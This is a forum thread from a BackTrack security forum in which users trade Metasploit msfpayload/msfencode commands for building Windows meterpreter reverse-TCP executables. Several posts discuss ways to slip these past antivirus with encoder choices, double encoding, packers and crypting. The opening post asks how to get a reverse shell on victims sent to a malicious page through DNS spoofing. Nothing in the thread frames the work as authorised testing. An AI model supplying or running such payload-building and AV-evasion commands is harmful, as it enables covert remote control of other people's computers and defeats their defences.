
Thread: Metasploiting for BT3 - Reverse TCP

  1. #71
    Just burned his ISO

    meterpreter, via html page

    I remember seeing an article on injecting a reverse shell via HTML, after having spoofed the DNS and redirected the victim to my page, but I cannot find the article. Does anyone know any information on this area?

    Or know any techniques that can get a reverse shell after a web page is visited?

    cheers

  2. #72
    Junior Member

    Quote Originally Posted by kazalku:
    Well, seems that the AV is getting smarter.
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=5555 R | ./msfencode -b '' -t exe -o output.exe

    The above exe can no longer be used because of the AV warning. Any idea to overcome this?
    Yours is getting caught?
    I think I either did
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=5555 R | ./msfencode -b '' -t exe -o output.exe

    or

    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=5555 R | ./msfencode -b '' -t exe >> output.exe


    You could always try stopping the service whilst you create it then do some magical mystical asm XOR'ing in the right places.

    Thanks for the heads up tho.

    //strange, I've just updated my defs and scanned it. Mine's not getting caught at scan time OR runtime.
    I'll give it a few days then start panicking.

  3. #73
    Junior Member

    Quote Originally Posted by kazalku:
    Well, seems that the AV is getting smarter.
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=5555 R | ./msfencode -b '' -t exe -o output.exe

    The above exe can no longer be used because of the AV warning. Any idea to overcome this?
    I have been running into this with avast as well, tried every trick I could think of but no luck. Anyone found a way around this?

  4. #74
    Gitsnik (Very good friend of the forum)

    Quote Originally Posted by rmills:
    I have been running into this with avast as well, tried every trick I could think of but no luck. Anyone found a way around this?
    Every trick included a different encoder or double encoding right?
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  5. #75
    Junior Member

    Quote Originally Posted by Gitsnik:
    Every trick included a different encoder or double encoding right?
    I don't know the encoder really well, but I tried the ideas I knew: a few combos of x86/fnstenv_mov, x86/jmp_call_additive and the standard x86/shikata_ga_nai, both single and double encoding. I don't know the syntax for the manual encoders like x86/unicode_upper; maybe that would do it? Counts don't seem to matter. Also tried the basic iexpress and nullsoft with some different combos using signed files, but when avast on-access scans it, game over. If you know the flags for the manual options please post.

    I could also be doing the double encoding wrong, I am using it like...

    Code:
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=XXXX LPORT=XXXX EXITFUNC=thread R | ./msfencode -e x86/fnstenv_mov -b '\x00\xff' -t raw | ./msfencode -b '' -t exe -o /tmp/payload.exe

  6. #76
    kazalku (Member)

    Quote Originally Posted by aliosity:
    Yours is getting caught?
    I think I either did
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=5555 R | ./msfencode -b '' -t exe -o output.exe

    or

    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=5555 R | ./msfencode -b '' -t exe >> output.exe


    You could always try stopping the service whilst you create it then do some magical mystical asm XOR'ing in the right places.

    Thanks for the heads up tho.

    //strange, I've just updated my defs and scanned it. Mine's not getting caught at scan time OR runtime.
    I'll give it a few days then start panicking.
    Both getting caught...
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

  7. #77
    kazalku (Member)

    Quote Originally Posted by rmills:
    I don't know the encoder really well, but I tried the ideas I knew: a few combos of x86/fnstenv_mov, x86/jmp_call_additive and the standard x86/shikata_ga_nai, both single and double encoding. I don't know the syntax for the manual encoders like x86/unicode_upper; maybe that would do it? Counts don't seem to matter. Also tried the basic iexpress and nullsoft with some different combos using signed files, but when avast on-access scans it, game over. If you know the flags for the manual options please post.

    I could also be doing the double encoding wrong, I am using it like...

    Code:
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=XXXX LPORT=XXXX EXITFUNC=thread R | ./msfencode -e x86/fnstenv_mov -b '\x00\xff' -t raw | ./msfencode -b '' -t exe -o /tmp/payload.exe
    This one as well....
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

  8. #78
    imported_vvpalin (Member)

    First of all, you don't need to triple pipe it like that; there is support in msfencode for multiple encoding. You might also want to try restricting more characters... other than that, your best bet is to output it then crypt it with something else.
    Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.

  9. #79
    Junior Member

    Quote Originally Posted by vvpalin:
    First of all, you don't need to triple pipe it like that; there is support in msfencode for multiple encoding. You might also want to try restricting more characters... other than that, your best bet is to output it then crypt it with something else.
    Can you give an example of something else you might encrypt it with?

  10. #80
    imported_vvpalin (Member)

    Quote Originally Posted by rmills:
    Can you give an example of something else you might encrypt it with?
    Google
    Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.
